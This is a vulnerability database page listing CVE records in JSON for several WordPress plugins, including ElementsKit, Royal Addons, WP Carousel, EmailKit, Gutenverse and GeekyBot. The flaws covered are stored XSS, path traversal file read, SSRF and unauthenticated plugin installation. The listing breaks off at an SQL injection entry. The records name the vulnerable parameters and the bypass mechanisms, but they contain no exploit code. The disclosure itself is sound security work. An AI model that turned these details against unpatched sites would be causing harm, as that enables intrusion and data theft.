Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
9599 vulnerabilities
CVE-2026-4362 (GCVE-0-2026-4362)
Vulnerability from cvelistv5 – Published: 2026-05-05 04:27 – Updated: 2026-05-05 04:27
VLAI?
Title
ElementsKit Elementor Addons <= 3.8.2 - Missing Authorization to Unauthenticated Widget Content Overwrite
Summary
The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `Live_Action::reset()` function in all versions up to, and including, 3.8.2 The function is hooked to the WordPress `init` action and triggers when both `post` and `action=elementor` GET parameters are present, with no authentication or nonce verification. This makes it possible for unauthenticated attackers to overwrite the Elementor content (`_elementor_data`) of any `elementskit_widget` custom post type by visiting a specially crafted URL. The widget's custom designs, text, and configurations are permanently replaced with a blank template.
Severity ?
6.5 (Medium)
CWE
- CWE-862 - Missing Authorization
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| roxnor | ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor |
Affected:
0 , ≤ 3.8.2
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "ElementsKit Elementor Addons \u2013 Advanced Widgets \u0026 Templates Addons for Elementor",
"vendor": "roxnor",
"versions": [
{
"lessThanOrEqual": "3.8.2",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jack Pas"
}
],
"descriptions": [
{
"lang": "en",
"value": "The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `Live_Action::reset()` function in all versions up to, and including, 3.8.2 The function is hooked to the WordPress `init` action and triggers when both `post` and `action=elementor` GET parameters are present, with no authentication or nonce verification. This makes it possible for unauthenticated attackers to overwrite the Elementor content (`_elementor_data`) of any `elementskit_widget` custom post type by visiting a specially crafted URL. The widget\u0027s custom designs, text, and configurations are permanently replaced with a blank template."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-862",
"description": "CWE-862 Missing Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T04:27:56.288Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7740fdfb-65b2-4d27-935f-b0e73487f0c4?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L27"
},
{
"url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L10"
},
{
"url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/init.php#L37"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3499543/elementskit-lite/trunk/modules/widget-builder/live-action.php"
},
{
"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Felementskit-lite/tags/3.8.2\u0026new_path=%2Felementskit-lite/tags/3.9.0"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-17T20:33:02.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T16:06:48.000Z",
"value": "Disclosed"
}
],
"title": "ElementsKit Elementor Addons \u003c= 3.8.2 - Missing Authorization to Unauthenticated Widget Content Overwrite"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-4362",
"datePublished": "2026-05-05T04:27:56.288Z",
"dateReserved": "2026-03-17T20:15:55.299Z",
"dateUpdated": "2026-05-05T04:27:56.288Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5159 (GCVE-0-2026-5159)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
Royal Addons for Elementor <= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Follow Button Text' Parameter
Summary
The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| wproyal | Royal Addons for Elementor – Addons and Templates Kit for Elementor |
Affected:
0 , ≤ 1.7.1056
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Royal Addons for Elementor \u2013 Addons and Templates Kit for Elementor",
"vendor": "wproyal",
"versions": [
{
"lessThanOrEqual": "1.7.1056",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Justin Nam"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget\u0027s \u0027instagram_follow_text\u0027 setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:39.544Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ee96d8c5-baf0-4c5c-9ace-e88bbb95ee0a?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193"
},
{
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3514368%40royal-elementor-addons%2Ftrunk\u0026old=3503219%40royal-elementor-addons%2Ftrunk\u0026sfp_email=\u0026sfph_mail="
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-30T14:26:21.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T14:53:29.000Z",
"value": "Disclosed"
}
],
"title": "Royal Addons for Elementor \u003c= 1.7.1056 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027Follow Button Text\u0027 Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5159",
"datePublished": "2026-05-05T03:37:39.544Z",
"dateReserved": "2026-03-30T14:12:40.826Z",
"dateUpdated": "2026-05-05T03:37:39.544Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-4665 (GCVE-0-2026-4665)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
WP Carousel Free <= 2.7.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'data-caption' Attribute
Summary
The WP Carousel Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via crafted fancybox `data-caption` attributes in all versions up to, and including, 2.7.10. This is due to the `fancybox-config.js` script reading the carousel container's `id` attribute directly from the DOM to construct a jQuery selector without sanitization. When a Contributor crafts an HTML block with a malformed carousel container ID (containing characters invalid for jQuery selectors), the custom fancybox configuration throws a JavaScript error and fails to initialize. This causes the bundled fancybox library (v3.5.7) to fall back to its default caption handling, which renders the `data-caption` attribute content as raw HTML. Since WordPress allows `data-*` attributes through `wp_kses_post()`, this makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks an image in the crafted carousel lightbox.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| shapedplugin | Carousel, Slider, Photo Gallery with Lightbox, Video Slider, by WP Carousel |
Affected:
0 , ≤ 2.7.10
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Carousel, Slider, Photo Gallery with Lightbox, Video Slider, by WP Carousel",
"vendor": "shapedplugin",
"versions": [
{
"lessThanOrEqual": "2.7.10",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Craig Smith"
}
],
"descriptions": [
{
"lang": "en",
"value": "The WP Carousel Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via crafted fancybox `data-caption` attributes in all versions up to, and including, 2.7.10. This is due to the `fancybox-config.js` script reading the carousel container\u0027s `id` attribute directly from the DOM to construct a jQuery selector without sanitization. When a Contributor crafts an HTML block with a malformed carousel container ID (containing characters invalid for jQuery selectors), the custom fancybox configuration throws a JavaScript error and fails to initialize. This causes the bundled fancybox library (v3.5.7) to fall back to its default caption handling, which renders the `data-caption` attribute content as raw HTML. Since WordPress allows `data-*` attributes through `wp_kses_post()`, this makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks an image in the crafted carousel lightbox."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:39.054Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e75815a3-2414-47f3-b0c4-e5d3e2cb369d?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wp-carousel-free/tags/2.7.10/public/js/fancybox-config.js#L3"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wp-carousel-free/trunk/public/js/fancybox-config.js#L3"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3506878/wp-carousel-free/trunk/public/js/fancybox.js"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-25T10:41:25.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T15:01:27.000Z",
"value": "Disclosed"
}
],
"title": "WP Carousel Free \u003c= 2.7.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027data-caption\u0027 Attribute"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-4665",
"datePublished": "2026-05-05T03:37:39.054Z",
"dateReserved": "2026-03-23T17:12:42.424Z",
"dateUpdated": "2026-05-05T03:37:39.054Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-4803 (GCVE-0-2026-4803)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
Royal Addons for Elementor <= 1.7.1056 - Unauthenticated Stored Cross-Site Scripting via 'status' Parameter in wpr_update_form_action_meta
Summary
The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'status' parameter in the wpr_update_form_action_meta AJAX action in all versions up to, and including, 1.7.1056. This is due to insufficient input sanitization and output escaping, combined with a publicly leaked nonce that allows unauthenticated access to the AJAX handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
7.2 (High)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| wproyal | Royal Addons for Elementor – Addons and Templates Kit for Elementor |
Affected:
0 , ≤ 1.7.1056
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Royal Addons for Elementor \u2013 Addons and Templates Kit for Elementor",
"vendor": "wproyal",
"versions": [
{
"lessThanOrEqual": "1.7.1056",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "andrea bocchetti"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027status\u0027 parameter in the wpr_update_form_action_meta AJAX action in all versions up to, and including, 1.7.1056. This is due to insufficient input sanitization and output escaping, combined with a publicly leaked nonce that allows unauthenticated access to the AJAX handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:38.588Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c91a14d3-bc41-4490-888c-486ad2994095?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L73"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/plugin.php#L613"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L21"
},
{
"url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-submissions-cpt.php#L23"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3503219/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-25T11:28:37.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T14:32:14.000Z",
"value": "Disclosed"
}
],
"title": "Royal Addons for Elementor \u003c= 1.7.1056 - Unauthenticated Stored Cross-Site Scripting via \u0027status\u0027 Parameter in wpr_update_form_action_meta"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-4803",
"datePublished": "2026-05-05T03:37:38.588Z",
"dateReserved": "2026-03-25T11:13:17.868Z",
"dateUpdated": "2026-05-05T03:37:38.588Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5957 (GCVE-0-2026-5957)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
EmailKit <= 1.6.5 - Authenticated (Author+) Arbitrary File Read via 'emailkit-editor-template' REST Parameter
Summary
The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to and including 1.6.5. This is due to a flawed path traversal validation in the create_template() method of the CheckForm class, where realpath() is called on the allowed base directory (wp-content/uploads/emailkit/templates/) which may not exist, causing it to return false. In PHP 8.x, strpos($real_path, false) implicitly converts false to an empty string, and strpos() with an empty needle always returns 0, causing the check strpos(...) !== 0 to evaluate to false and bypassing the path validation entirely. This makes it possible for authenticated attackers, with Author-level access and above, to read arbitrary files from the server, including sensitive files such as wp-config.php, by supplying an absolute path to the emailkit-editor-template REST API parameter.
Severity ?
6.5 (Medium)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| roxnor | EmailKit – Email Customizer for WooCommerce & WP |
Affected:
0 , ≤ 1.6.5
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EmailKit \u2013 Email Customizer for WooCommerce \u0026 WP",
"vendor": "roxnor",
"versions": [
{
"lessThanOrEqual": "1.6.5",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Nguyen Cong Quang"
}
],
"descriptions": [
{
"lang": "en",
"value": "The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to and including 1.6.5. This is due to a flawed path traversal validation in the create_template() method of the CheckForm class, where realpath() is called on the allowed base directory (wp-content/uploads/emailkit/templates/) which may not exist, causing it to return false. In PHP 8.x, strpos($real_path, false) implicitly converts false to an empty string, and strpos() with an empty needle always returns 0, causing the check strpos(...) !== 0 to evaluate to false and bypassing the path validation entirely. This makes it possible for authenticated attackers, with Author-level access and above, to read arbitrary files from the server, including sensitive files such as wp-config.php, by supplying an absolute path to the emailkit-editor-template REST API parameter."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:38.237Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae58e5b0-b587-4503-8519-c5a50245891a?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L166"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L170"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/EmailSettings/MetformEmailSettings.php#L252"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L170"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L163"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L163"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L166"
},
{
"url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailSettings/MetformEmailSettings.php#L252"
},
{
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026new=3511701%40emailkit%2Ftrunk\u0026old=3496714%40emailkit%2Ftrunk\u0026sfp_email=\u0026sfph_mail="
}
],
"timeline": [
{
"lang": "en",
"time": "2026-04-09T09:20:21.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T14:47:21.000Z",
"value": "Disclosed"
}
],
"title": "EmailKit \u003c= 1.6.5 - Authenticated (Author+) Arbitrary File Read via \u0027emailkit-editor-template\u0027 REST Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5957",
"datePublished": "2026-05-05T03:37:38.237Z",
"dateReserved": "2026-04-09T09:01:29.056Z",
"dateUpdated": "2026-05-05T03:37:38.237Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-2948 (GCVE-0-2026-2948)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.5.3 - Authenticated (Contributor+) Server-Side Request Forgery via 'imageUrl'
Summary
The Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.5.3 via the import_images() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
Severity ?
6.4 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| jegstudio | Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem |
Affected:
0 , ≤ 3.5.3
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem",
"vendor": "jegstudio",
"versions": [
{
"lessThanOrEqual": "3.5.3",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Osvaldo Noe Gonzalez Del Rio"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.5.3 via the import_images() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:37.872Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac909a4b-d949-42eb-871a-963bc6242c12?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3507804/gutenverse"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-02-21T19:13:28.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T14:51:49.000Z",
"value": "Disclosed"
}
],
"title": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem \u003c= 3.5.3 - Authenticated (Contributor+) Server-Side Request Forgery via \u0027imageUrl\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-2948",
"datePublished": "2026-05-05T03:37:37.872Z",
"dateReserved": "2026-02-21T18:56:55.447Z",
"dateUpdated": "2026-05-05T03:37:37.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5294 (GCVE-0-2026-5294)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
GeekyBot <= 1.2.2 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation via 'geekybot_frontendajax' AJAX Action
Summary
The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution.
Severity ?
9.8 (Critical)
CWE
- CWE-862 - Missing Authorization
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ahmadgb | GeekyBot — AI Copilot, Chatbot, WooCommerce Lead Gen & Zero-Prompt Content |
Affected:
0 , ≤ 1.2.2
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "GeekyBot \u2014 AI Copilot, Chatbot, WooCommerce Lead Gen \u0026 Zero-Prompt Content",
"vendor": "ahmadgb",
"versions": [
{
"lessThanOrEqual": "1.2.2",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Di Nhau"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-862",
"description": "CWE-862 Missing Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:37.441Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1817c58-e807-4ef2-a382-28ca2fd5239e?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3497169/geeky-bot"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-31T23:12:10.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T15:26:29.000Z",
"value": "Disclosed"
}
],
"title": "GeekyBot \u003c= 1.2.2 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation via \u0027geekybot_frontendajax\u0027 AJAX Action"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5294",
"datePublished": "2026-05-05T03:37:37.441Z",
"dateReserved": "2026-03-31T22:56:16.553Z",
"dateUpdated": "2026-05-05T03:37:37.441Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-3456 (GCVE-0-2026-3456)
Vulnerability from cvelistv5 – Published: 2026-05-05 03:37 – Updated: 2026-05-05 03:37
VLAI?
Title
GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation <= 1.2.0 - Unauthenticated SQL Injection via 'attributekey'
Summary
